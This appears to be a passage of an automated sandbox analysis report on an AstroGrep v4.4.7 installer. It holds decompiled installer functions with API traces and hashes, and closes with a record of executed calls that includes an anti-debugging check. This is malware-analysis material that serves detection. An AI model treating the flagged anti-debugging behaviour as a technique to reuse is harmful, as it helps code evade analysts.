                                                                                                            					if(_t26 == 0) {
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					_t16 =  *( *0x42e410 + 0x64);
                                                                                                            					_t20 =  ~_t16;
                                                                                                            					_t18 = _t16 * _t26 +  *0x42e440;
                                                                                                            					while(1) {
                                                                                                            						_t18 = _t18 + _t20;
                                                                                                            						_t26 = _t26 - 1;
                                                                                                            						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						if(_t26 != 0) {
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					 *0x42dbe0 = _t18[1];
                                                                                                            					 *0x42e4a8 = _t18[3];
                                                                                                            					_t23 =  &(_t18[5]);
                                                                                                            					if(_t23 != 0) {
                                                                                                            						 *0x42dbdc = _t23;
                                                                                                            						E00405C8D(_t24,  *_t18 & 0x0000ffff);
                                                                                                            						SetWindowTextA( *0x429848, E00405D51(_t13, _t24, _t26, "AstroGrep v4.4.7 Setup", 0xfffffffe));
                                                                                                            						_t11 =  *0x42e42c;
                                                                                                            						_t27 =  *0x42e428;
                                                                                                            						if(_t11 == 0) {
                                                                                                            							L15:
                                                                                                            							return _t11;
                                                                                                            						}
                                                                                                            						_t25 = _t11;
                                                                                                            						do {
                                                                                                            							_t11 =  *_t27;
                                                                                                            							if(_t11 != 0) {
                                                                                                            								_t11 = E00405D51(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                                                                            							}
                                                                                                            							_t27 = _t27 + 0x418;
                                                                                                            							_t25 = _t25 - 1;
                                                                                                            						} while (_t25 != 0);
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					L7:
                                                                                                            					if(_t13 != 0xffff) {
                                                                                                            						_t13 = 0;
                                                                                                            					} else {
                                                                                                            						_t13 = 0x3ff;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • SetWindowTextA.USER32(00000000,AstroGrep v4.4.7 Setup), ref: 00403A0C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $1033$AstroGrep v4.4.7 Setup$AstroGrep v4.4.7 Setup
                                                                                                            • API String ID: 530164218-3845018338
                                                                                                            • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                                            • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                                            • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                                            • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00402A7A(void* _a4, char* _a8, intOrPtr _a12) {
                                                                                                            				void* _v8;
                                                                                                            				char _v272;
                                                                                                            				long _t18;
                                                                                                            				intOrPtr* _t27;
                                                                                                            				long _t28;
                                                                                                            
                                                                                                            				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x42e4b0 | 0x00000008,  &_v8);
                                                                                                            				if(_t18 == 0) {
                                                                                                            					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                                            						if(_a12 != 0) {
                                                                                                            							RegCloseKey(_v8);
                                                                                                            							L8:
                                                                                                            							return 1;
                                                                                                            						}
                                                                                                            						if(E00402A7A(_v8,  &_v272, 0) != 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					RegCloseKey(_v8);
                                                                                                            					_t27 = E004060C8(3);
                                                                                                            					if(_t27 == 0) {
                                                                                                            						if( *0x42e4b0 != 0) {
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                                            						if(_t28 != 0) {
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            						return _t28;
                                                                                                            					}
                                                                                                            					return  *_t27(_a4, _a8,  *0x42e4b0, 0);
                                                                                                            				}
                                                                                                            				return _t18;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                            • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                                            • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                            • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00401CDE(int __edx) {
                                                                                                            				void* _t17;
                                                                                                            				struct HINSTANCE__* _t21;
                                                                                                            				struct HWND__* _t25;
                                                                                                            				void* _t27;
                                                                                                            
                                                                                                            				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                                                                            				GetClientRect(_t25, _t27 - 0x58);
                                                                                                            				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A3A(_t21), _t21,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                                                                                            				if(_t17 != _t21) {
                                                                                                            					DeleteObject(_t17);
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t27 - 4));
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            Addresses
                                                                                                            • 0x00401ce8, 0x00401cef, 0x00401d1e, 0x00401d26, 0x00401d2d, 0x00401d2d, 0x004028d2, 0x004028de

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 00401CE2
                                                                                                            • GetClientRect.USER32 ref: 00401CEF
                                                                                                            • LoadImageA.USER32 ref: 00401D10
                                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 763b4bf58b938fb9abbbbf1fb7f74f3e5dbcbbd1c05f8ded2862ff9186105390
                                                                                                            • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                                            • Opcode Fuzzy Hash: 763b4bf58b938fb9abbbbf1fb7f74f3e5dbcbbd1c05f8ded2862ff9186105390
                                                                                                            • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004057A1(CHAR* _a4) {
                                                                                                            				CHAR* _t7;
                                                                                                            
                                                                                                            				_t7 = _a4;
                                                                                                            				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                            					lstrcatA(_t7, 0x409014);
                                                                                                            				}
                                                                                                            				return _t7;
                                                                                                            			}

                                                                                                            Addresses
                                                                                                            • 0x004057a2, 0x004057b9, 0x004057c1, 0x004057c1, 0x004057c9

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-3916508600
                                                                                                            • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                            • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                                            • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                            • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040583A(CHAR* _a4) {
                                                                                                            				CHAR* _t5;
                                                                                                            				char* _t7;
                                                                                                            				CHAR* _t9;
                                                                                                            				char _t10;
                                                                                                            				CHAR* _t11;
                                                                                                            				void* _t13;
                                                                                                            
                                                                                                            				_t11 = _a4;
                                                                                                            				_t9 = CharNextA(_t11);
                                                                                                            				_t5 = CharNextA(_t9);
                                                                                                            				_t10 =  *_t11;
                                                                                                            				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                                                                                                            					if(_t10 != 0x5c || _t11[1] != _t10) {
                                                                                                            						L10:
                                                                                                            						return 0;
                                                                                                            					} else {
                                                                                                            						_t13 = 2;
                                                                                                            						while(1) {
                                                                                                            							_t13 = _t13 - 1;
                                                                                                            							_t7 = E004057CC(_t5, 0x5c);
                                                                                                            							if( *_t7 == 0) {
                                                                                                            								goto L10;
                                                                                                            							}
                                                                                                            							_t5 = _t7 + 1;
                                                                                                            							if(_t13 != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							return _t5;
                                                                                                            						}
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					return CharNextA(_t5);
                                                                                                            				}
                                                                                                            			}

                                                                                                            Addresses
                                                                                                            • 0x00405843, 0x0040584a, 0x0040584d, 0x0040584f, 0x00405853, 0x00405868, 0x00405887, 0x00000000, 0x0040586f, 0x00405871, 0x00405872, 0x00405875, 0x00405876, 0x0040587e, 0x00000000, 0x00000000, 0x00405880, 0x00405883, 0x00000000, 0x00000000, 0x00000000, 0x00405883, 0x00000000, 0x00405872, 0x00405860, 0x00000000, 0x00405861

                                                                                                            APIs
                                                                                                            • CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                            • CharNextA.USER32(00000000), ref: 0040584D
                                                                                                            • CharNextA.USER32(00000000), ref: 00405861
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CharNext
                                                                                                            • String ID: C:\
                                                                                                            • API String ID: 3213498283-3404278061
                                                                                                            • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                            • Instruction ID: 19ae957cdd7e66f1aaea138ca2c8f088f7fbe10d55ad18dca4d2112a8e91772d
                                                                                                            • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                            • Instruction Fuzzy Hash: 7FF0C253904F506EFB3272640C44B775B98CB55390F18C47BED90A62C1827C4C604F9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00402C02(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				// _a4 == 0 is the "show" path. The dialog's HWND is kept in the global at 0x420420.
				if(_a4 == 0) {
					__eflags =  *0x420420; // 0x0
					if(__eflags == 0) {
						// No dialog yet: create it only once the tick-count deadline stored at 0x42e40c has passed.
						// Caveat: a raw '>' on GetTickCount() values misbehaves across the 32-bit wrap (every ~49.7 days); the (now - deadline) > 0 idiom does not.
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42e40c;
						if(_t2 >  *0x42e40c) {
							// CreateDialogParamA(hInstance = *0x42e400, dialog template 0x6f (111), no parent, dialog procedure E00402B7F, lParam 0)
							_t3 = CreateDialogParamA( *0x42e400, 0x6f, 0, E00402B7F, 0);
							 *0x420420 = _t3;
							return ShowWindow(_t3, 5); // 5 = SW_SHOW
						}
						return _t2;
					} else {
						// Dialog already exists: hand off to E00406104 (defined elsewhere in the listing).
						return E00406104(0);
					}
				} else {
					// _a4 != 0 is the "hide" path: destroy the dialog if it exists and clear the global.
					_t6 =  *0x420420; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420420 = 0;
					return _t6;
				}
			}

APIs
• DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
• GetTickCount.KERNEL32 ref: 00402C33
• CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
• ShowWindow.USER32(00000000,00000005), ref: 00402C5E
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
• Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
• Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
• Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004054C0(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				// Global STARTUPINFOA at 0x42b070; cb = 0x44 is sizeof(STARTUPINFOA) on 32-bit Windows. No other field is set.
				0x42b070->cb = 0x44;
				// CreateProcessA(no image name, command line = _a4, no security attributes, no handle inheritance,
				// dwCreationFlags 0x04000000 = CREATE_DEFAULT_ERROR_MODE, inherited environment and cwd, &si, &pi)
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42b070,  &_v20);
				if(_t7 != 0) {
					// The primary thread handle is closed right away; only the process handle is returned and the caller owns it.
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				// On failure _t7 is the FALSE from CreateProcessA, so the caller sees 0 in place of a handle.
				// The string "Error launching installer" is referenced at 004054D3 inside this function, but the decompilation does not show where it is consumed.
				return _t7;
			}

APIs
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
• CloseHandle.KERNEL32(?), ref: 004054F6
Strings
• Error launching installer, xrefs: 004054D3
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
• Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
• Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
• Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004057E8(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				// Start at the terminator and walk backwards (CharPrevA is DBCS-aware) until a '\' (0x5c) is found or the start of the buffer is reached.
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				// Cut the buffer in place at that position ("x & 0" is just "x = 0"): the caller's string is left holding only the directory part.
				 *_t3 =  *_t3 & 0x00000000;
				// Return the tail after the separator. The strings captured around this call are consistent with that split:
				// C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE appears alongside C:\Users\user\AppData\Local\Temp.
				// Edge case: with no '\' at all the loop stops at index 0, so the buffer is emptied and the returned tail starts at the second character.
				return  &(_t3[1]);
			}

APIs
• lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,00402CD2,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004057EE
• CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp,00402CD2,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004057FC
Strings
• C:\Users\user\AppData\Local\Temp, xrefs: 004057E8
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\AppData\Local\Temp
• API String ID: 2709904686-501415292
• Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
• Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
• Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
• Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00405907(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				// Case-insensitive substring search: find needle _a8 inside haystack _a4 (the trace shows "[Rename]" as the needle).
				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				// Loop while the remaining haystack is at least needle-length; lstrlenA is recomputed every iteration (quadratic, but the inputs are short).
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					// Temporarily NUL-terminate the haystack at needle length so lstrcmpiA compares just that window. The haystack must therefore be writable memory.
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					// Restore the overwritten byte. As decompiled this reads back the NUL it just wrote; the real code almost certainly keeps the original byte
					// in a register the decompiler did not track, otherwise the haystack would be truncated on the first pass.
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;   // match: return a pointer into the haystack
					} else {
						_t27 = CharNextA(_t27);   // advance one character (DBCS-aware)
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;   // no match
				goto L5;
			}

APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
• lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040592F
• CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
• lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
• Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
• Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
• Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
Uniqueness

Uniqueness Score: -1.00%

                                                                                                            Executed Functions

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00EA4E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.461546770.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 25d8447044cd77f35417334db38c4a99f9d65c47c68452e2d4a0053a07dbfb71
                                                                                                            • Instruction ID: 8bc17ce5c43fb72d9977714ebad01e72f971d2af6289364e3c43590a6a1b3138
                                                                                                            • Opcode Fuzzy Hash: 25d8447044cd77f35417334db38c4a99f9d65c47c68452e2d4a0053a07dbfb71
                                                                                                            • Instruction Fuzzy Hash: BE4146B0E006588FDB10CFA9C985B9EBBF1FB89314F109529E814BB384D7B4A845CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00EA4E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.461546770.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 597cc9a878d4c97dc0010b5cedd05b6f08e185aae1fb7044b01426cd17ea51ba
                                                                                                            • Instruction ID: 93bf23d7a0bcd2a3830e44837ddeb3390aabd88ca869b7d64ed12b2a77a84e2c
                                                                                                            • Opcode Fuzzy Hash: 597cc9a878d4c97dc0010b5cedd05b6f08e185aae1fb7044b01426cd17ea51ba
                                                                                                            • Instruction Fuzzy Hash: 184127B0D006589FDB10CFA9C985B9EBBF1FB89314F149529E814BB384D7B4A845CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00EAD64F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.461546770.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662101638-0
                                                                                                            • Opcode ID: 111fdc594f082870b19cdf998024ed4fef98bc04fb03a16bcce68a5b9c2df520
                                                                                                            • Instruction ID: 1fd9667ee53c0f9bb3391c112b7a05a7ba8b700f8ffd6b150a0fedfd952802be
                                                                                                            • Opcode Fuzzy Hash: 111fdc594f082870b19cdf998024ed4fef98bc04fb03a16bcce68a5b9c2df520
                                                                                                            • Instruction Fuzzy Hash: BA2169718002198FCB10CFA9C984BEEBBF4AF89324F15846AD459B7740D778A945CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
